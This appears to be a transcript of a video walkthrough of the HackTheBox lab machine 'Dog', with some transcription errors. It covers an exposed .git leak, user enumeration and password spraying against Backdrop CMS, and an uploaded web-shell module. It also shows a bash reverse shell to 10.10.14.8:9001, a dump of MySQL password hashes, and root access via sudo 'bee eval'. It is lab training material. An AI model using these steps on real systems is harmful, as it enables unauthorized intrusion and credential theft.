What's going on YouTube? This is Ipsec, and we'll be doing Dog from HackTheBox, which is a nice and easy machine that is running backdrop CMS and has an open .git directory. If we pull the .git directory, we'll discover MySQL credentials, but it doesn't give us anything right away because the username doesn't let us log into backdrop CMS. We'll have to find a way to enumerate valid users on this CMS so we can perform a password spray, which gets a little bit tricky because some of the endpoints have brute force protection, but poking around, we can find a way to enumerate users that is unprotected. So we can do that, find valid users, then perform a password spray, log into Backdrop, and then we'll install a malicious plugin to get code execution and switch to another user through password reuse yet again. And then for root, we can run a tool called B that helps us manage Backdrop via Sudo. The tool itself supports running PHP scripts, so we can easily switch to root using the built-in command of eval. So with that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, -v enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it dog, and then the IP address, which is 10.10.11.58. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and the banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Apache, also running on Ubuntu. And then it's also got a lot of the nmap scripts running, right? The interesting ones are robots.txt. That gives us a lot of URLs we could potentially play with. Readme.md, most likely this comes from GitHub. If we see this file, we can always go ahead and request that real quick. Because normally when you look at a README, it may have things like the version of software installed, right? In this case, it tells us it is running on Backdrop, but I don't see anything related to the versions. But we could always go to the GitHub repo and try to find it there. We do see the copyright is 2024. The year of recording this video is 2025. So we know this is at least a little bit out of date, right? But let's see what other scripts we have. The title, which is home dog. That's the Apache header. We also see a expose.git repository. Now, a lot of boxes previously have had an exposed Git, but nmap wasn't discovering it. So what's different about this? Well, a lot of the previous ones had virtual host routing. So just accessing the IP address told you had to go to a different host, which until you add it to your host file so that DNS resolution works, you couldn't access it, right? This one doesn't have any virtual host routing. So nmap is able to make queries against that web server for default files, and .git is one of the ones nmap has. So really nice to have nmap tell us a Git repository was found. We should go ahead and download that, but before I do, I just want to take a look at the website. We know this is going to be backdrop CMS, which I think has been done in the Carpe Diem HackTheBox machine before. But yeah, let's just look at this. So we have welcome to dog, and it looks just like a post. Now, a CMS system like WordPress or something like that. Now, the things I normally look for is how to just list all users, right? In WordPress, you'd click on the username, and then the URL would have /wp-something (u equals 1 or something. And then you could just increment that ID u equals 2, u equals 3 and whatever and get all the users. Backdrop isn't giving us a way to do that. I did some light Googling and asking AI. It doesn't seem like Backdrop by default exposes that. There is a API plugin on Backdrop that could be installed, which then you could potentially do queries like that. But right now, we don't have a way to just enumerate usernames super easily. If we go over into home, about, kind of the same thing. We have a potential email support at dog.htb. Login, it's just a login panel, right? So let's go ahead and download the .git directory, right? Because if we do .git, let's see what we get. We just have the Git repository. So I'm going to copy this. I'm going to make a directory called source. Source, not srv. Let's get rid of srv. There we go. I'm going to run a tool called git-dumper. If you don't have this, you can probably just do a pip-x install git-dumper. But we just give it the Git directory and then where we want to save it to, which is source. And it's going to go ahead and fetch that .git and then assemble the latest commit for us. So once this happens, we'll be able to look at what the Git database looks like, right? And it's possible that there may be credentials in this. There may be plugins that we could enumerate on backdrop so we could see what plugins installed and potentially find a vulnerability there, because a lot of these CMS systems, the exploits aren't within the CMS itself. It's within the plugins that get installed afterwards, right? Those have a lot less eyes on them to check. And this is taking much longer than I thought to download, but there we go. It's done. I thought I was going to have to pause the video there for a second. But looking in this directory, if we look at it, let's see, is there like a plugins directory? If I do grep plugin, views, plugins, test plugins, layout, CK editor plugins, maybe I'm at a loss right now. So I'm going to check one of the files first. It was just settings.php. So let's go ahead and open that. And right off the bat, when I'm looking at it, we see database, and then we have backdrop, whatever, right? So we have a password here. I'm going to just grep MySQL on that file so I can easily copy it. And then other things I would do is like a git log to see if there's any other commits. Maybe we could go back to a previous one and find passwords there, but we have a username and a password. So what I want to do is go back over here and then go to login. We can do root and put in this password, and we get unrecognized username. If we do, let's find a valid user, right? So I'm going to go over to dog. We have dog backdrop system. Normally the author is also a user. So if I do this, we get incorrect password. So we have a way to enumerate valid usernames. We could also go to like the reset password. And if we do root here, we see not recognized username or email address. And if we put in this, we get unable to send email. So we have a easy way to enumerate users. Let's go ahead and send this over to Burp Suite. So I'm going to send it here, and I'm going to use the request password just because I think that's a better one to use so I don't have to worry about a second parameter. So let's go ahead and send root here. What I want to do is see what the code looks like so we can easily see how much work it's going to be to edit this. We just do a post to queue password. We get a whole page back. I was hoping it would just be like an API response. Username root form build ID. Let's see, error message. Maybe we could search for this, right? There we go. I'm going to, let's send this copy to file. And it's not cat. This one's going to be dog. I'm going to call this like login.request. And let's edit this. So let's do cd v login.request. And then name, I'm going to put fuzz here. And now I can do fuff-request login.request. We want to set request proto to just be HTTP. And then I'm going to do -h real quick. Let's see. Word list, we'll use op sec list discovery. There should be a usernames, right? Maybe it's under discovery, usernames. And let's see. I'm just going to do names and names.txt. Normally, I would use like the Zato net 10 million, but this word list is pretty big to do over HTTP, and it could take a long time. This one is much shorter, so always kind of play with the word list you want. And then what we want to do is find a string on a page. Let's see, is it like match like MR for regular expression? Let's see, that's output. Filter regex. There we go. So we probably want to do match regex. No, filter out. We'll do filter regex and error message. And let's see if we get any hits. We're doing about 70 requests per second, and there's a total of 10,000 here. So I'm going to pause the video, and we will resume once it is complete. Actually, I realized I just made a mistake, right? Because we're filtering out for error message. But when we had a valid username, we still got an error. It was like cannot send mail or something like that. So we have to really fine tune our regular expression. So instead of error message, maybe we should just do is not recognized as a username, right? So if we copy this And then let's go back and replace the filter regex for this one. And we get a bunch of hits. That is odd. Let's turn our proxy off, go over to the page, and oh, this is rate limited. So we have some type of rate limit at play. Too many password reset attempts from your IP address. Please try again later. We could attempt the login, but I'm going to guess it's going to have the same behavior. So let's test this out real quick. I'm going to intercept this. Let's just do root password, attempt to log in. We'll send this to repeater. There's probably going to be a error message here, right? No. Let's just turn that off. Unrecognized username. So let's go back to repeater. Unrecognized username. There we go. This is what we want. So I'm going to now copy, where's to file? There it is. And I should move login.request to forgot password.request. Sorry for any confusion if that confused you earlier, but now I can just save login.request. And this one is a login. And I'm going to change the name to be fuzz. I'm going to run the fuff again. But this time, we're just going to paste not error message. That's definitely not it. It was like invalid username, right? Let's just send this again. Unrecognized username. I hope it's not unrecognized username or password. Let's go ahead and find that valid user real quick. Or like, yeah, let's do that. Here's this. Let's now change this to be the username. Unrecognized username. Okay, we don't have a match. I was kind of concerned it would be like unrecognized username or password or something like that, but it's not. So we can use this error message. We run this and we start getting a bunch of 403s. So I'm going to guess we have a rate limit. We could just attempt to log in and see. Let's do root password. Too many failed attempts from my IP address. So we keep getting rate limited. And at that point, it's now time to see if there's any scripts to like scan backdrop things. So I'm just going to do backdrop CMS scan GitHub, fix that typo. And let's search. Let's see, anti-scan, block bad crawlers. Let's see. Maybe I should add like scanner. BackDropScan. Here's a program. I should probably zoom in to make this bigger for you. And it's by FizMatHack, who is also the creator of this box. But if we look at BackDropScan, we should be able to see what this looks like. So we can scan, looks like we can enumerate versions, list potential users, and then attempt logins. And it's only one Python script, so I'm just going to look at it. If we want to enumerate the version, it looks like we can get this file. So I'm just going to see this because I want to see what it looks like. So if we go here, I'm just going to do curl. There we go. So that's okay. There we go. 1.27.1. So we have a way to list the version, enum user. So it uses /q accounts and then the username. So this is going to be a GET request as well. So let's just do change request method. And we can just do q accounts. And then I'm going to do root. We get a 404. If we go back, what is the valid username? Let's just go to dog, copy this, paste, 403. So this is what we want. We want a 403 forbidden. So let's go ahead and copy the file. And this will be enum user.request. And I'm also kind of curious, can we specify by that? No. I was hoping we could do like user ID and would spit out what the account is, but it doesn't look like we can. So let's see. Let's go back to a FUF. And we will want to do two things. First, change the file to be user, what I call it, user enum.request, I think. Let's just do a ls enum user. There we go. And then we can do a MC for match code because a invalid one is 404. And then what was the valid one? We get a 403 forbidden on valid. So we're going to match code 403 and hopefully this works. It just immediately stopped. Where did we screw up? Oh, yeah, we have to edit the enum user and then specify where we want to fuzz. So we'll do it after the accounts. There we go. And it's going to start enumerating this. And this is a good sign so far. We don't have a bunch of like invalid hits right here. So I'm going to pause the video and we'll resume once this FUF either finds something or completes. Oh, as I was about to, we get one hit, Axel. So let's go ahead and try this. So let's go cat, what was it, source settings. Let's grep password on it. There we go. Nope, we want to grep MySQL. There we go. So we want to try Axel as the username. So let's go ahead and log in. Axel, paste this password. And incorrect password. But we know that was a valid account because it didn't say unknown user, right? So we're making progress. We just have to wait till we get a hit. So now I'm going to pause the video and we'll resume either the next time a user comes up or when this thing finishes. Okay, it is now finished and we have a few accounts we can try. I'm going to attempt to log in with Tiffany. So let's go back here. Let's change the username to Tiffany, put in that same password, and we get logged into the Backdrop page. Now, from previous exploitation of Backdrop, I mentioned Carpe Diem's machine. I know I can upload a malicious plugin. So let's go ahead and see what that looks like, right? First, I have to find out where the plugin is. Actually, Backdrop calls it modules. And we have to upload a module here. So what I'm going to do is, let's just go to Google. I'm going to turn Burp Suite off, disable. There we go. And if we Google like GitHub Backdrop exploit, let's see. We could just use this. This is an authenticated remote command. And it's a Python script that's going to create the module for us and then automatically do it. Now, I don't find a lot of value in this because I don't see exactly kind of how it works. So what I did on the Carpe Diem machine is I looked for an older exploit, and we see this CSRF to RCE on Backdrop CMS. And this one just gave us the module as a reference file, which made it a little bit easier for us to play with, right? So I could read the whole description. It would tell me this tar is what it uploads. And if we just download it and look at it, it'll be a bit self-explanatory, right? So actually I download the page. We go here and we can download reference.tar. This is what I want. There we go. So I'm just going to untar it. So we do this. And it just has the structure for what the Backdrop module should look like, right? So if we looked at shell.php, we see it's just system get command, right? So let's go ahead and upload this tar archive. So we can go install module. Let's see, manual installation. Install, let's do, there we go, upload. And what I want to do is HTTP dog. And then let's see, reference.tar. Install. Okay, installation was completed. And how we access this is we just go to the backdrop, and then I think it's modules, the name of the plugin, and then we can do shell.php because that's the file. Was it module? Reference? That did not work. I wonder if the cleanup script blocked us. I'm going to try this again real quick. We may have to be fast on this. So we can do manual installation again, upload, browse, reference.tar. Okay. Paste. There we go. So we can do cmd equals ID, and we have it. Now, we could just send this over to Burp Suite to get the reverse shell, but I'm going to use curl just because I've shown how to do it in Burp Suite 100 times. So what we want to do is tell curl to do a GET request because the actual module used GET, not request or post. And then we give it the URL. So we'll do this. And then I'm going to do data and then URL encode. And then we can do cmd is equal to --c --i dev tcp 10.10.14.8 9001 0 and 1 like that. And that should be good. So let's just listen on 9001, run this, and we get the shell. So I kind of like using curl every now and then instead of Burp Suite because I hate having to just manually URL encode things in the request. It is nice having curl just have this parameter for us, right? So let's do Python 3-c import pty spawn, if I can spell spawn, bin bash, like that. There we go. st2i raw minus echo foreground. Let's do export term is equal to x term. So now we can clear the screen. And let's see. Normally, the very first thing I like doing is dumping all the hashes. So I'm going to do a MySQL -u root -p. Let's specify this password. Copy, paste. Then what was that database name? Use backdrop. And then we can say describe. It's probably users. There we go. So I could just do select, let's do name pass from users, and we get a list of hashes there. We could send this over to Hashcat, but this isn't really going to help us too much because it is password reuse. I just kind of wanted to show this is something I would normally do. But one of the other important things always is looking at users on the box. So if we grep past WD and grep for everything that ends in SH, we have three things: root, Joubert, and John SU whatever, or CU. So I'm going to do a awk, separate on a colon, get every first entry. We have three things. So let's do, I'm just going to do it on a new terminal, v users.text, paste this. Let's get that password again. It was this backdrop one. Copy. I can't remember if there was an exclamation point at the end of this or not, but let's try it without. 10.10.11.58 users.text p, put this in. And this will just attempt to log in via SSH with this password for all three users that have a shell. You could also upload a program called like SU crack to the box and then do it locally, which is also a good idea because sometimes the user exists, but they're denied SSH access, right? But in this case, we can log in. So let's do John CU SAC at 10.10.11.58. Put in that password again, and we get in with password reuse from the MySQL. If we do a sudo-l, we can see we can run the program B. So let's see exactly what this is. So I'm going to do b-h, and let's scroll up to the top. And let's see. It looks like a command line thing to manage backdrop, right? So global options, root, set the root directory of backdrop to use. If not set, we'll try to find it automatically based upon the current directory. Site base URL, we can put it in debug mode. So yeah, we can export the config. We don't really need to do that because we already had MySQL access. We could download the core of it, not really that interesting. We could delete the database, which we definitely don't want to do because that may take the site down, right? Let's see, information, we can get logs, version, run a cron. Let's see, download, permissions, state, themes, adding, deleting users. I'm kind of skipping through this because we already have admin on Backdrop. So we could do all this functionality anyways, right? We could just create a user through the admin access we had here. So it's not really that interesting right off the bat. We do have at the bottom a way to eval. So we're going to be able to execute PHP code. So let's try what this is. We'll do a sudo b eval, and code is required. So if I just do -code test, we get the required bootstrap level for eval is not ready. Now, remember, at the very top of the help, it said something, right? I should probably enable debug mode as well. But we had this --root, specify the root directory of backdrop to use. If not, it'll be, do it based upon the current directory. So we should try that. I'm also going to do -d for debug because I'm curious what that will show. I guess it doesn't do anything, but we could also say --root, and then it's probably under var /dub HTML would be my guess. One is not a valid directory. What? --root var /dub HTML. Do we do it before? Do I not do -code? Okay, so we definitely need it after eval. Root var /dub HTML. So what I'm going to do, let's not use that flag. I'm sure there's a way to use it, but let's see if this gets off. It looks like this works. So use of undefined constant test. So that's not valid PHP code. So let's just do something PHP like PHP info. That sounds like a PHP command to me. And we get the results. So all I'm going to do now is a system command. And I'm going to do system, and we'll say bash, right? So we're going to run the bash command through PHP. And because we're sudo, this should run as root. So hit enter, and there we go, root at dog. So that's the box, right? We can now cat root.txt and get it. There is one thing I forgot to do because I was going so fast, and that's way at the beginning of the box. When we did the fuff to enumerate valid users, we could have also went into the source directory where we pulled the source. And I've did like a grep, and let's just grep for an email on the box like dog.htb. We can see Tiffany at dog, so that's another way to find out the user exists, right? But I like enumerating the valid username through fuff much more than this. That's why I showed it first. But that's going to be the box. Hope you guys enjoyed it. Take care, and I'll see you all next time.